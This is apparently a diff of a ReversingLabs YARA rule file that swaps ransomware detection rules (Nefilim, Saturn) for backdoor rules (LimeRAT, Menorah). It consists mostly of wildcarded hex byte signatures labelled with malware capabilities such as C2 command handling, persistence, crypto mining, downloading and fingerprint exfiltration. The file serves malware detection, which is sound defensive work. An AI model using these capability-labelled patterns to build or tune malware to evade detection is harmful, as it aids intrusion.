15 ?? ?? ?? ?? 41 8B C4 4C 8B A4 24 ?? ?? ?? ?? 48 8B B4 24 ?? ?? ?? ?? 48 8B BC + 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? 48 33 CC E8 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? + 41 5D 5D 5B C3 } condition: - uint16(0)==0x5A4D and ($search_files and $encrypt_files and $remote_connection) + uint16(0)==0x5A4D and ( all of ($network_communication_p*)) and ( all of ($handle_c2_commands_p*)) and ( all of ($create_cab_file_and_upload_p*)) and ( all of ($cmd_expand_payload_p*)) } -rule REVERSINGLABS_Win32_Ransomware_Nefilim : TC_DETECTION MALICIOUS MALWARE FILE +rule REVERSINGLABS_Bytecode_MSIL_Backdoor_Limerat : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Yara rule that detects Nefilim ransomware." + description = "Yara rule that detects LimeRAT backdoor." author = "ReversingLabs" - id = "aec298c1-abf8-5446-9dbb-795f9fcf8e94" - date = "2020-07-15" - modified = "2020-07-15" + id = "c2ef6f27-3fb8-55f4-97a6-9e25a3d1ce49" + date = "2024-03-04" + modified = "2024-03-04" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Nefilim.yara#L1-L150" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "fae0350e51aee2777475d2222848b30fd39fa39ceea260132b0c7fbc536b3a86" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/backdoor/ByteCode.MSIL.Backdoor.LimeRAT.yara#L1-L91" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "03eaa2ac41950f036601222b32a28c03aae3b3445501e988e2f87e231a1a1522" score = 75 quality = 90 tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Nefilim" + tc_detection_type = "Backdoor" + tc_detection_name = "LimeRAT" tc_detection_factor = 5 importance = 25 strings: - $create_encryption_key = { - 55 8B EC 51 A1 ?? ?? ?? ?? C1 E8 ?? 6B C0 ?? 56 50 E8 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? - ?? 8B F0 A1 ?? ?? ?? ?? 59 89 75 ?? 73 ?? B8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 50 E8 ?? - ?? ?? ?? 33 F6 59 59 39 35 ?? ?? ?? ?? 75 ?? 53 57 8B 3D ?? ?? ?? ?? 56 6A ?? 56 BE - ?? ?? ?? ?? 56 BB ?? ?? ?? ?? 53 FF D7 85 C0 75 ?? 6A ?? 6A ?? 50 56 53 FF D7 85 C0 - 75 ?? 50 FF 15 ?? ?? ?? ?? 5F 33 F6 5B A1 ?? ?? ?? ?? C1 E8 ?? 6B C0 ?? 68 ?? ?? ?? - ?? 56 56 50 FF 75 ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 56 EB ?? 5E C9 - C3 - } - $encrypt_encryption_key = { - 55 8B EC 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 68 ?? ?? ?? ?? 8D 45 ?? 8D 4D ?? E8 - ?? ?? ?? ?? 83 78 ?? ?? 59 72 ?? 8B 00 53 56 57 33 DB 53 53 6A ?? 53 53 68 ?? ?? ?? - ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 33 FF 8D 75 ?? 89 45 ?? E8 ?? ?? ?? ?? 39 5D ?? 0F 84 - ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? BF ?? ?? ?? ?? 57 FF D3 99 83 E2 ?? 03 C2 C1 F8 ?? 6B - C0 ?? 50 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 57 8B F0 FF D3 50 57 E8 ?? ?? - ?? ?? 59 59 57 FF D3 99 83 E2 ?? 03 C2 C1 F8 ?? 6B C0 ?? 89 45 ?? 8D 45 ?? 50 56 6A - ?? 6A ?? 6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 85 C0 75 ?? FF 15 ?? ?? ?? - ?? 8D 45 ?? 50 57 FF D3 99 83 E2 ?? 03 C2 C1 F8 ?? 6B C0 ?? 50 56 FF 75 ?? FF 15 ?? - ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 56 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? - 6A ?? 33 FF 8D 75 ?? E8 ?? ?? ?? ?? 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? C9 C3 - } - $encrypt_files_p1 = { - 55 8B EC 83 E4 ?? 83 EC ?? A1 ?? ?? ?? ?? 33 C4 89 44 24 ?? 83 7D ?? ?? 8B 45 ?? 53 - 56 57 73 ?? 8D 45 ?? 33 DB 53 53 6A ?? 53 53 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 - 44 24 ?? 3B C3 0F 84 ?? ?? ?? ?? 8D 4C 24 ?? 51 50 FF 15 ?? ?? ?? ?? A1 ?? ?? ?? ?? - 6B C0 ?? 83 C0 ?? 83 F8 ?? 0F 8E ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 6A ?? 89 44 24 ?? - E8 ?? ?? ?? ?? FF 74 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? FF 74 24 ?? E8 ?? ?? ?? ?? BE - ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 56 89 44 24 ?? E8 ?? ?? ?? ?? FF 74 24 ?? 8B 54 24 ?? - 89 44 24 ?? E8 ?? ?? ?? ?? FF 74 24 ?? 8B 54 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? FF 15 ?? - ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 7E ?? 68 ?? ?? ?? ?? 8D 74 24 ?? E8 ?? ?? ?? ?? 6A ?? - 33 FF E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 53 53 FF 74 24 ?? FF 74 24 ?? - FF 74 24 ?? FF D7 53 FF 15 ?? ?? ?? ?? 53 8D 44 24 ?? 50 56 FF 74 24 ?? FF 74 24 ?? - FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 - F8 ?? 0F 84 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 53 03 C6 53 13 CB 51 50 FF 74 24 ?? - FF D7 53 8D 44 24 ?? 50 56 FF 74 24 ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 8B 44 24 ?? 8B - } - $encrypt_files_p2 = { - 4C 24 ?? 53 05 ?? ?? ?? ?? 53 13 CB 51 50 FF 74 24 ?? FF D7 53 E8 ?? ?? ?? ?? 0B C2 - 59 74 ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 6A ?? 33 FF 8D 74 24 ?? E8 ?? ?? - ?? ?? 8B 3D ?? ?? ?? ?? 53 8D 44 24 ?? 50 FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 74 - 24 ?? FF 15 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 3B C3 0F 8C ?? ?? ?? ?? 7F ?? 81 F9 - ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? 89 5C 24 ?? 89 5C 24 ?? 3B C3 0F 8C ?? ?? ?? ?? 7F ?? - 3B CB 0F 86 ?? ?? ?? ?? BE ?? ?? ?? ?? EB ?? 8B 4C 24 ?? 2B 4C 24 ?? 1B 44 24 ?? 89 - 44 24 ?? 0F 88 ?? ?? ?? ?? 7F ?? 81 F9 ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? 56 53 FF 15 ?? - ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 53 53 FF 74 24 ?? 89 44 24 ?? FF 74 24 ?? FF 74 24 ?? - FF D7 53 8D 44 24 ?? 50 56 FF 74 24 ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 8B 4C 24 ?? 8B - 54 24 ?? 51 56 FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 53 FF 74 24 ?? FF 74 24 ?? FF - 74 24 ?? FF D7 53 8D 44 24 ?? 50 56 FF 74 24 ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? FF 15 - ?? ?? ?? ?? FF 74 24 ?? 53 50 FF 15 ?? ?? ?? ?? 81 44 24 ?? ?? ?? ?? ?? 8B 44 24 ?? - 11 5C 24 ?? 39 44 24 ?? 0F 8C ?? ?? ?? ?? 0F 8F ?? ?? ?? ?? 8B 4C 24 ?? 39 4C 24 ?? - 0F 82 ?? ?? ?? ?? E9 ?? ?? ?? ?? 3B C3 0F 8C ?? ?? ?? ?? 7F ?? 81 F9 ?? ?? ?? ?? 0F + $persistence_mechanism = { + 02 2C ?? 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? + 28 ?? ?? ?? ?? 16 16 15 28 ?? ?? ?? ?? 26 2B ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? + ?? ?? ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 28 ?? ?? + ?? ?? 28 ?? ?? ?? ?? DE } - $encrypt_files_p3 = { - 86 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 74 24 ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 56 E8 ?? ?? - ?? ?? 59 89 44 24 ?? FF 15 ?? ?? ?? ?? 53 53 33 C9 51 33 C0 50 FF 74 24 ?? FF D7 53 - 8D 44 24 ?? 50 56 FF 74 24 ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 8B 4C 24 ?? 8B 54 24 ?? - 51 56 FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 53 33 C0 50 50 FF 74 24 ?? FF D7 53 8D - 44 24 ?? 50 56 FF 74 24 ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? FF 74 24 ?? E8 ?? ?? ?? ?? - 59 E9 ?? ?? ?? ?? 51 53 FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 44 24 ?? FF 15 ?? - ?? ?? ?? 53 53 33 C0 50 53 FF 74 24 ?? FF D7 53 8D 44 24 ?? 50 FF 74 24 ?? FF 74 24 - ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 74 24 ?? E8 ?? ?? ?? ?? 8B 4C 24 - ?? 8B 54 24 ?? 51 FF 74 24 ?? FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 53 33 C0 50 53 - FF 74 24 ?? FF D7 53 8D 44 24 ?? 50 FF 74 24 ?? FF 74 24 ?? FF 74 24 ?? FF 15 ?? ?? - ?? ?? FF 74 24 ?? 53 FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 33 FF 8D 74 24 ?? - E8 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? FF 74 24 ?? E8 ?? ?? ?? ?? FF 74 24 ?? - E8 ?? ?? ?? ?? FF 74 24 ?? E8 ?? ?? ?? ?? FF 74 24 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? - 8D 45 ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 78 ?? ?? 72 ?? 8B 00 83 7D ?? ?? 8B - 4D ?? 73 ?? 8D 4D ?? 50 51 FF 15 ?? ?? ?? ?? 6A ?? 33 FF 8D 74 24 ?? E8 ?? ?? ?? ?? - 6A ?? 33 FF 8D 75 ?? E8 ?? ?? ?? ?? 8B 4C 24 ?? 5F 5E 5B 33 CC E8 ?? ?? ?? ?? 8B E5 - 5D C3 + $crypto_miner = { + 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 8E 69 16 31 ?? 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? + ?? ?? 0B 07 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0C 08 6F ?? ?? ?? ?? 0D 2B ?? 09 6F ?? ?? + ?? ?? 74 ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F + ?? ?? ?? ?? 2C ?? 72 ?? ?? ?? ?? 0A DE ?? 09 6F ?? ?? ?? ?? 2D ?? DE ?? 09 2C ?? 09 + 6F ?? ?? ?? ?? DC DE ?? 25 28 ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? DE ?? 28 ?? ?? ?? ?? + 0A DE ?? 25 28 ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? DE ?? 06 } - $find_files_1 = { - 55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 56 - 57 6A ?? 5E 33 C0 33 FF 6A ?? 66 89 44 24 ?? 57 8D 45 ?? 8D 4C 24 ?? 89 74 24 ?? 89 - 7C 24 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 66 - 89 44 24 ?? 66 89 44 24 ?? 8B 84 24 ?? ?? ?? ?? 03 44 24 ?? 8D 4C 24 ?? 89 74 24 ?? - 89 7C 24 ?? 89 74 24 ?? 89 7C 24 ?? E8 ?? ?? ?? ?? 57 8D 44 24 ?? 50 83 C8 ?? 8D 74 - 24 ?? E8 ?? ?? ?? ?? 57 8D 84 24 ?? ?? ?? ?? 50 83 C8 ?? E8 ?? ?? ?? ?? 8B DE 8D 44 - 24 ?? E8 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 7C 24 ?? ?? 8B 44 24 ?? 73 ?? 8D 44 24 - ?? 8D 8C 24 ?? ?? ?? ?? 51 50 FF 15 ?? ?? ?? ?? 89 44 24 ?? 83 F8 ?? 0F 84 ?? ?? ?? - ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 + $downloader = { + 73 ?? ?? ?? ?? 0A 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 7E + ?? ?? ?? ?? 72 ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 2C ?? 7E ?? ?? ?? ?? 2C ?? 72 ?? ?? ?? + ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 2C ?? 06 7E ?? ?? ?? ?? 07 6F ?? + ?? ?? ?? 07 28 ?? ?? ?? ?? 26 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 2B ?? + 06 7E ?? ?? ?? ?? 07 6F ?? ?? ?? ?? 07 28 ?? ?? ?? ?? 26 00 06 6F ?? ?? ?? ?? 14 0A + DE ?? 25 28 ?? ?? ?? ?? 0C 28 ?? ?? ?? ?? DE ?? DE ?? 25 28 ?? ?? ?? ?? 0D 28 ?? ?? + ?? ?? DE } - $find_files_2 = { - D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 - ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? F6 - 84 24 ?? ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 8D 4C 24 ?? 8D 44 24 ?? 74 ?? E8 ?? ?? - ?? ?? 8D 4C 24 ?? 51 E8 ?? ?? ?? ?? 59 8B D8 59 8D 44 24 ?? E8 ?? ?? ?? ?? 6A ?? 33 - FF 8D 74 24 ?? E8 ?? ?? ?? ?? 6A ?? 8D 74 24 ?? E8 ?? ?? ?? ?? 83 EC ?? 8B CC 21 79 - ?? 33 C0 6A ?? C7 41 ?? ?? ?? ?? ?? 66 89 01 50 8D 44 24 ?? E8 ?? ?? ?? ?? E8 ?? ?? - ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 59 8D 44 24 ?? E8 ?? ?? ?? ?? 6A - ?? 33 FF 8D 74 24 ?? E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 50 8D - 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 6A ?? 5F 39 7C 24 ?? 73 ?? 8D 44 24 ?? 8B 35 ?? - ?? ?? ?? 68 + $network_communication_p1 = { + 16 80 ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 25 28 ?? ?? ?? ?? 0B 28 ?? ?? + ?? ?? DE ?? 00 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 25 28 ?? ?? ?? ?? 0C 28 ?? ?? ?? + ?? DE ?? 00 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 25 28 ?? ?? ?? ?? 0D 28 ?? ?? ?? ?? + DE ?? 00 73 ?? ?? ?? ?? 80 ?? ?? ?? ?? 7E ?? ?? ?? ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? + 7E ?? ?? ?? ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 15 6F ?? ?? ?? ?? 7E ?? + ?? ?? ?? 15 6F ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 73 ?? + ?? ?? ?? 13 ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? 11 ?? 14 72 ?? ?? ?? ?? 17 8D ?? ?? ?? ?? + 25 16 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 14 14 14 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? + ?? ?? ?? 15 16 28 ?? ?? ?? ?? 13 ?? 11 ?? 16 9A 80 ?? ?? ?? ?? 73 ?? ?? ?? ?? 26 11 + ?? 73 ?? ?? ?? ?? 17 11 ?? 8E 69 6F ?? ?? ?? ?? 9A 28 ?? ?? ?? ?? 80 ?? ?? ?? ?? 11 + ?? 6F ?? ?? ?? ?? DE ?? 25 28 ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? DE ?? DE ?? 11 ?? 2C + ?? 11 ?? 6F ?? ?? ?? ?? DC 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? + ?? 17 80 ?? ?? ?? ?? 73 ?? ?? ?? ?? 80 ?? ?? ?? ?? 1F ?? 8D ?? ?? ?? ?? 25 16 72 ?? + ?? ?? ?? A2 25 17 7E ?? ?? ?? ?? A2 25 18 28 ?? ?? ?? ?? A2 25 19 7E ?? ?? ?? ?? A2 } - $find_files_3 = { - 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 8B 44 24 ?? 39 7C 24 ?? 73 ?? 8D 44 24 ?? 68 ?? ?? - ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 8B 44 24 ?? 39 7C 24 ?? 73 ?? 8D 44 24 ?? 68 - ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 8B 44 24 ?? 39 7C 24 ?? 73 ?? 8D 44 24 - ?? 68 ?? ?? ?? ?? 50 FF D6 85 C0 74 ?? 8B 44 24 ?? 39 7C 24 ?? 73 ?? 8D 44 24 ?? 68 - ?? ?? ?? ?? 50 FF D6 85 C0 74 ?? 8B 44 24 ?? 39 7C 24 ?? 73 ?? 8D 44 24 ?? 68 ?? ?? - ?? ?? 50 FF D6 85 C0 74 ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 74 ?? - 8B 4C 24 ?? 39 7C 24 ?? 73 ?? 8D 4C 24 ?? 83 EC ?? 8B C4 51 E8 ?? ?? ?? ?? E8 ?? ?? - ?? ?? 83 C4 ?? 6A ?? 33 FF 8D 74 24 ?? E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF 74 - 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 33 DB - 43 53 33 FF 8D 74 24 ?? E8 ?? ?? ?? ?? 53 8D B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 8D - 74 24 ?? E8 ?? ?? ?? ?? 53 8D 75 ?? E8 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 5F 5E 5B 33 - CC E8 ?? ?? ?? ?? 8B E5 5D C3 + $network_communication_p2 = { + 25 1A 28 ?? ?? ?? ?? A2 25 1B 7E ?? ?? ?? ?? A2 25 1C 72 ?? ?? ?? ?? A2 25 1D 7E ?? + ?? ?? ?? A2 25 1E 28 ?? ?? ?? ?? A2 25 1F ?? 72 ?? ?? ?? ?? A2 25 1F ?? 28 ?? ?? ?? + ?? A2 25 1F ?? 7E ?? ?? ?? ?? A2 25 1F ?? 28 ?? ?? ?? ?? A2 25 1F ?? 7E ?? ?? ?? ?? + A2 25 1F ?? 28 ?? ?? ?? ?? A2 25 1F ?? 7E ?? ?? ?? ?? A2 25 1F ?? 28 ?? ?? ?? ?? A2 + 25 1F ?? 7E ?? ?? ?? ?? A2 25 1F ?? 28 ?? ?? ?? ?? A2 25 1F ?? 7E ?? ?? ?? ?? A2 25 + 1F ?? 28 ?? ?? ?? ?? A2 25 1F ?? 7E ?? ?? ?? ?? A2 25 1F ?? 7E ?? ?? ?? ?? 8C ?? ?? + ?? ?? A2 25 1F ?? 7E ?? ?? ?? ?? A2 25 1F ?? 28 ?? ?? ?? ?? A2 25 1F ?? 7E ?? ?? ?? + ?? A2 25 1F ?? 72 ?? ?? ?? ?? A2 25 1F ?? 7E ?? ?? ?? ?? A2 25 1F ?? 72 ?? ?? ?? ?? + A2 25 1F ?? 7E ?? ?? ?? ?? A2 25 1F ?? 28 ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 + 25 1F ?? 7E ?? ?? ?? ?? A2 25 1F ?? 7E ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? + 7E ?? ?? ?? ?? 2C ?? 7E ?? ?? ?? ?? 2B ?? 7E } condition: - uint16(0)==0x5A4D and ( all of ($find_files_*)) and ($create_encryption_key) and ($encrypt_encryption_key) and ( all of ($encrypt_files_p*)) + uint16(0)==0x5A4D and ($persistence_mechanism) and ($crypto_miner) and ($downloader) and ( all of ($network_communication_p*)) } -rule REVERSINGLABS_Win32_Ransomware_Saturn : TC_DETECTION MALICIOUS MALWARE FILE +rule REVERSINGLABS_Bytecode_MSIL_Backdoor_Menorah : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Yara rule that detects Saturn ransomware." + description = "Yara rule that detects Menorah backdoor." author = "ReversingLabs" - id = "70a8d937-aee5-54d8-9409-c5d2d0830a2b" - date = "2020-10-19" - modified = "2020-10-19" + id = "4f13a6c6-bd97-58aa-ac3b-399866b5c63b" + date = "2024-05-10" + modified = "2024-05-10" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Saturn.yara#L1-L105" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "efa748346ad8c46e654542d302e81d633a2d12f421636c477431a12a34636132" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/backdoor/ByteCode.MSIL.Backdoor.Menorah.yara#L1-L169" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "770aefca192ceb3a778c0b1259105ace8e64cb35d0c34acb15c45fb6f22ad94b" score = 75 quality = 90 tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Saturn" + tc_detection_type = "Backdoor" + tc_detection_name = "Menorah" tc_detection_factor = 5 importance = 25 strings: - $find_files_1 = { - 6A ?? C6 45 ?? ?? 8D 4D ?? 8B 3B 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? 3B C8 74 ?? - 83 78 ?? ?? 8B C8 72 ?? 8B 08 FF 70 ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? - ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 - 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? - C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 - ?? ?? 8D 4D ?? 6A ?? 68 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 - ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? 6A ?? 68 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? - C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 6A + $send_fingerprint_to_c2_p1 = { + 28 ?? ?? ?? ?? 04 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A + 73 ?? ?? ?? ?? 19 1F 0E 6F ?? ?? ?? ?? 17 28 ?? ?? ?? ?? 1F 5B 13 ?? 12 ?? 28 ?? ?? + ?? ?? 1F 40 13 ?? 12 ?? 28 ?? ?? ?? ?? 1F 40 13 ?? 12 ?? 28 ?? ?? ?? ?? 1F 5D 13 ?? + 12 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 1B 8D ?? ?? ?? ?? 25 16 1F 5B 13 ?? 12 ?? 28 ?? + ?? ?? ?? A2 25 17 1F 40 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 18 06 A2 25 19 1F 40 13 ?? + 12 ?? 28 ?? ?? ?? ?? A2 25 1A 1F 5D 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 6F + ?? ?? ?? ?? 0B 28 ?? ?? ?? ?? 07 6F ?? ?? ?? ?? 0C 72 ?? ?? ?? ?? 0D 1F 3F 13 ?? 12 + ?? 28 ?? ?? ?? ?? 17 16 28 ?? ?? ?? ?? 1F 3D 13 ?? 12 ?? 28 ?? ?? ?? ?? 17 16 28 ?? + ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 03 11 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 74 ?? ?? ?? ?? + 13 ?? 11 ?? 1F 50 13 ?? 12 ?? 28 ?? ?? ?? ?? 1F 4F 13 ?? 12 ?? 28 ?? ?? ?? ?? 1F 53 + 13 ?? 12 ?? 28 ?? ?? ?? ?? 1F 54 13 ?? 12 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? + ?? ?? 11 ?? 1F 21 8D ?? ?? ?? ?? 25 16 1F 61 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 17 1F + 70 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 18 1F 70 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 19 1F + 6C 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1A 1F 69 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1B 1F + 63 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1C 1F 61 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1D 1F + 74 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1E 1F 69 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 09 } - $find_files_2_p1 = { - 68 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? - ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? FF B5 - ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 8D 4D ?? 83 7D ?? ?? 8B 55 ?? 0F 43 4D ?? 50 51 E8 - ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 83 7D ?? ?? 8D 85 ?? ?? ?? ?? FF 75 - ?? 0F 43 85 ?? ?? ?? ?? 8D 4D ?? 83 7D ?? ?? 8B 55 ?? 0F 43 4D ?? 50 51 E8 ?? ?? 